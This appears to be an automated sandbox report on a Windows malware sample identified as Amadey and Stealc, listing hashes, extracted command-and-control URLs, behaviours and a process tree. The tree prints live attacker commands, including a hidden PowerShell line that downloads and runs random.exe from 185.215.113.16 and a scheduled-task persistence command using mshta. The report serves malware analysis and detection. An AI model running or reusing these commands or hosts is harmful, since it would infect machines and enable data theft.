Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 19:57

General

  • Target

    79e3c982bccb1dfc82910ab4a93080f1bb98f406e170751f118a6e49a0955e35.exe

  • Size

    5.5MB

  • MD5

    37dba1eb6b423de4bc99daa73ad84735

  • SHA1

    6e1857c13eff12a4af572ea4e0290774355bd068

  • SHA256

    79e3c982bccb1dfc82910ab4a93080f1bb98f406e170751f118a6e49a0955e35

  • SHA512

    2f80a10403e86fc25f0006398ff9c7710beaf981da15afcda9fae6a1e55b9aee194412223abd39462f8556e97f82fa977c1d076167b5fa30dd467db88783b053

  • SSDEEP

    98304:+D+rKebSGX1X+i6Uc2zB8EQd+Et/DSL5z7LQUVEmuMAFM/xQIwfh8w1q:9K2N0+Et+1XLQHmPaIO

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\79e3c982bccb1dfc82910ab4a93080f1bb98f406e170751f118a6e49a0955e35.exe
    "C:\Users\Admin\AppData\Local\Temp\79e3c982bccb1dfc82910ab4a93080f1bb98f406e170751f118a6e49a0955e35.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K5f16.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K5f16.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y3g64.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y3g64.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1n70D1.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1n70D1.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2036
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2G6013.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2G6013.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4948
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g46A.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g46A.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2436
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 1572
          4⤵
          • Program crash
          PID:2148
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J269S.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J269S.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\97C6.tmp\97C7.tmp\97C8.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J269S.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2092
        • C:\Windows\system32\timeout.exe
          timeout /t 2
          4⤵
          • Delays execution with timeout.exe
          PID:3548
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3640
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1560
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3080
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4544
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "5XJ1EmaOCYG" /tr "mshta \"C:\Temp\GeMlfRE5D.hta\"" /sc minute /mo 60 /ru "Admin" /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2636
        • C:\Windows\system32\mshta.exe
          mshta "C:\Temp\GeMlfRE5D.hta"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4292
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5068
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2436 -ip 2436
    1⤵
      PID:4264
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4352
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4668

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\GeMlfRE5D.hta

      Filesize

      796B

      MD5

      a59eb779137c2c4364c86d9e4838abc2

      SHA1

      7bc963e54c2aed1313d5ee4ab6a0d4904e02a664

      SHA256

      2e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc

      SHA512

      d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      58b97594c4d764d5d99a459fbee0fd33

      SHA1

      4d1f8f4f5bbf87a6ea3ae7b7be623542377365da

      SHA256

      8001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2

      SHA512

      874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      df4d87b6845d3fddf6e659396aea0757

      SHA1

      a636715074a17bb786eca83543fb685219f23f57

      SHA256

      0ea4203b826c4795e76f169fb364d512d3b03426c1e82719c6ec3b3446187f70

      SHA512

      df4d70ef157b2dafce200cea052f0509d821d14f5cbcf7704149275a3e863ed7bfcda8d7f91b5539aa899c902a5743d13bc01f07797f4b0b564cefff5c36b7c4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      641d91acf624fc39159e3af34654e499

      SHA1

      75586676f46ad65f6d0534b84988b3a46d9babfe

      SHA256

      5881a6a4bca366df39dc6a883aa97d2430016d88be087355068f2ac28222403b

      SHA512

      f7e88851b46c1e65073c0d47d5c35b338db1ac5247ecb4301c3d29cbd2aeeef58d5ad6f2403591fe6e22aa54f7bb7d414a718c86c5decd058e25082bda1aced3

    • C:\Users\Admin\AppData\Local\Temp\97C6.tmp\97C7.tmp\97C8.bat

      Filesize

      2KB

      MD5

      18283422f83c1ac93981ad87b116aaaa

      SHA1

      397308fcc63eef6bdccada1b6bd8ae5d37e81482

      SHA256

      1573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873

      SHA512

      0892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J269S.exe

      Filesize

      89KB

      MD5

      b6851da650c9c7224d5b0bcd6d163bac

      SHA1

      07dc3706e77a198bf5d4e6a8b0f15b7eaedeb306

      SHA256

      d86e09fe575a06d9464a5fddc09140f999c68d373e472223a416838e33daaec3

      SHA512

      5abd8087d500ec8c05b54628559f08bbf767322f444c436549a4ec928912b785b21a20054f7856935ffb989780e6f4a4697cbad6d783a95e5ce34812a663e3aa

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K5f16.exe

      Filesize

      5.3MB

      MD5

      74ebe94bc98c9cfa7930d05d5f6865e5

      SHA1

      ffb23fb83d9bc99051801fddb97a3c9d4279147e

      SHA256

      6b4fa6786c4e211bcb4c99f1e89906cafebe811fd55d91fd9ffd24e93fd04b10

      SHA512

      41fae984cf1ca5180c5610ff07a838e6196850d21b110cd90d0df38782e32ffa7335cdba34a8a5f42e378a0877471da9b1cb9d1904a3fc18c1f01167885e09ef

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g46A.exe

      Filesize

      1.7MB

      MD5

      f41dfd98d7f8304859ecb4feb2af914b

      SHA1

      2e8e93a59956d0d357071328daef15b2f6685741

      SHA256

      95fcbefdb108b4d18062c436acdd24302da8ad64e48f1883972c892c9ac8b817

      SHA512

      f4ac099b42e5bcab7388f307b6407ee6718b749d7c62b979bd76826944f326f1d4f54f9cd8668800728791775ee75241e90b2ce461c2a4eff4494b1ad0c9c466

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y3g64.exe

      Filesize

      3.5MB

      MD5

      0659985309c46fa8346b430b580e0ed3

      SHA1

      a112dc6a348767d8f24da87a910910a94d746b02

      SHA256

      1652b4ec8ea32f74d61b4496f595c988ae3202e42cdb37c646cbd68796d721f8

      SHA512

      2665ac8a5daba038f65ec48911f93da265d65ea892e02fe82eeb8eefefb3ef20a77b2c4823ac24312040c14c31b8c5c408d44ba0b81f286529d6975a1e61404e

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1n70D1.exe

      Filesize

      1.8MB

      MD5

      b19968ce1bae3f78cd47be95f23dae98

      SHA1

      338e9ecfbd7a7c7daa464e3d2f39c74d4c87323c

      SHA256

      60e2b228776229793a49ef25964b015a6891973cdee1a2e356df050c67f57fb6

      SHA512

      b9f3183df1ac2942d8b4f9e7a506ab0473a67282bb9fc1094695be401981239a2dc3522e0965aff4f3a1cb469dabaf2d85b0933b7d9e8182da94a39014faf645

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2G6013.exe

      Filesize

      3.0MB

      MD5

      68984bfc5808fd9bc2d2a712d1cee2d6

      SHA1

      a3567947af38d293806a34df3bc653d65eca292a

      SHA256

      19512457e6a13ac9ccd45c325cd0877b58f5beb3b60270935124d75552030711

      SHA512

      e412d61b5b74fa3e9d6a1e4fb5f73ef96dc19375e1d0ffa8a3fd138fc827cdae5ded714d629f8df2e567c49d1ae35883e9fc573520834985007baa30dfed6d80

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yt45eurp.evk.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1060-33-0x0000000000FC0000-0x000000000145E000-memory.dmp

      Filesize

      4.6MB

    • memory/1060-20-0x0000000000FC0000-0x000000000145E000-memory.dmp

      Filesize

      4.6MB

    • memory/1560-56-0x000001ED63A00000-0x000001ED63A22000-memory.dmp

      Filesize

      136KB

    • memory/2036-109-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-115-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-49-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-121-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-47-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-120-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-45-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-44-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-119-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-118-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-114-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-104-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-113-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-112-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-34-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2036-111-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/2436-50-0x0000000000E00000-0x0000000001486000-memory.dmp

      Filesize

      6.5MB

    • memory/2436-42-0x0000000000E00000-0x0000000001486000-memory.dmp

      Filesize

      6.5MB

    • memory/2436-46-0x0000000000E00000-0x0000000001486000-memory.dmp

      Filesize

      6.5MB

    • memory/2436-48-0x0000000000E00000-0x0000000001486000-memory.dmp

      Filesize

      6.5MB

    • memory/4352-108-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/4352-106-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/4668-117-0x0000000000EB0000-0x000000000134E000-memory.dmp

      Filesize

      4.6MB

    • memory/4948-38-0x0000000000630000-0x000000000093F000-memory.dmp

      Filesize

      3.1MB

    • memory/4948-39-0x0000000000630000-0x000000000093F000-memory.dmp

      Filesize

      3.1MB